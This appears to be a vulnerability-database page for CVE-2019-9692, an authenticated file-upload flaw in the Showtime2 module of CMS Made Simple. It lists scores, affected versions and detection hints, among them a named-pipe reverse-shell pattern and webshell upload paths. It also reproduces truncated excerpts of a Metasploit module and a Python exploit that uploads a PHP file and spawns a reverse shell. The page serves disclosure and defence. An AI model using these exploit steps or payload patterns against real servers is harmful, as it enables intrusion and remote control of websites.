CVE-2019-9692
published 2019-03-11CVE-2019-9692: class.showtime2_image.php in CMS Made Simple (CMSMS) before 2.2.10 does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG…
PriorityP357medium6.5CVSS 3.0
AVNACLPRLUINSUCNIHAN
EXPLOIT
EPSS
46.52%
98.7th percentile
class.showtime2_image.php in CMS Made Simple (CMSMS) before 2.2.10 does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cmsmadesimple | cms_made_simple | < 2.2.10 | 2.2.10 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect multipart POST to /admin/moduleinterface.php with mact=Showtime2 and m1_upload_submit=Upload — this is the file upload trigger for the exploit. ↗
- →Alert on GET or POST requests to /uploads/images/*.php — a PHP file served from the image upload directory indicates successful webshell placement. ↗
- →Monitor for HTTP GET to /modules/Showtime2/moduleinfo.ini — used by attackers to fingerprint the vulnerable Showtime2 module version prior to exploitation. ↗
- →Detect uploaded files with non-image extensions (e.g. .php, .php5, .phtml) in the watermark/upload path — the vulnerability is the absence of extension validation in class.showtime2_image.php. ↗
- →Look for the named pipe reverse shell pattern (mkfifo /tmp/f) in process execution logs on the web server — this is the default post-exploitation payload used by the PoC. ↗
- →Versions Showtime2 <= 3.6.2 on CMSMS <= 2.2.9.1 are confirmed vulnerable; check version string in /modules/Showtime2/moduleinfo.ini for triage. ↗
- ·Exploitation requires an authenticated session with 'Use Showtime2' privilege — this is not an unauthenticated vulnerability. ↗
- ·The Metasploit module uses a CSRF token extracted from the login redirect Location header; detections based solely on cookie presence may miss sessions that bypass login via stolen credentials. ↗
CVSS provenance
nvdv3.06.5MEDIUMCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)
exploitdb·2019-03-28
CVE-2019-9692 CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
'Description' => %q(
This module exploits a File Upload vulnerability that lead in a RCE in
Showtime2 module ( MSF_LICENSE,
'Author' =>
[
'Daniele Scanu', # Discovery & PoC
'Fabio Cogno' # Metasploit module
],
'References' =>
[
['CVE', '2019-9692'],
['CWE', '434'],
['EDB', '46546'],
['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],
['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']
],
'Platform' =>
Exploit-DB
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
exploitdb·2019-03-15
CVE-2019-9692 CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
---
#!/usr/bin/env python
# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module
# Date: March 2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2
# Version: Showtime2 module ", 'text/plain'),
'__c': __c_var,
'mact': 'Showtime2,m1_,defaultadmin,0',
'm1_upload_submit': 'Upload'
}
)
response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,
headers={'Content-Type': multipart_data.content_type})
# Call the script uploaded for spawn a reverse shell
def spawn_shell():
print "[*] Spawn a shell to " + lhost + ":" + str(lpo
Metasploit
CMS Made Simple (CMSMS) Showtime2 File Upload RCE
metasploit
CMS Made Simple (CMSMS) Showtime2 File Upload RCE
CMS Made Simple (CMSMS) Showtime2 File Upload RCE
This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with "Use Showtime2" privilege could exploit the vulnerability. The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG). Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1
No writeups or analysis indexed.
http://packetstormsecurity.com/files/152269/CMS-Made-Simple-CMSMS-Showtime2-File-Upload-Remote-Command-Execution.htmlhttp://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47http://www.rapid7.com/db/modules/exploit/multi/http/cmsms_showtime2_rcehttps://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285https://www.exploit-db.com/exploits/46546/https://www.exploit-db.com/exploits/46627/http://packetstormsecurity.com/files/152269/CMS-Made-Simple-CMSMS-Showtime2-File-Upload-Remote-Command-Execution.htmlhttp://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47http://www.rapid7.com/db/modules/exploit/multi/http/cmsms_showtime2_rcehttps://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285https://www.exploit-db.com/exploits/46546/https://www.exploit-db.com/exploits/46627/
2019-03-11
Published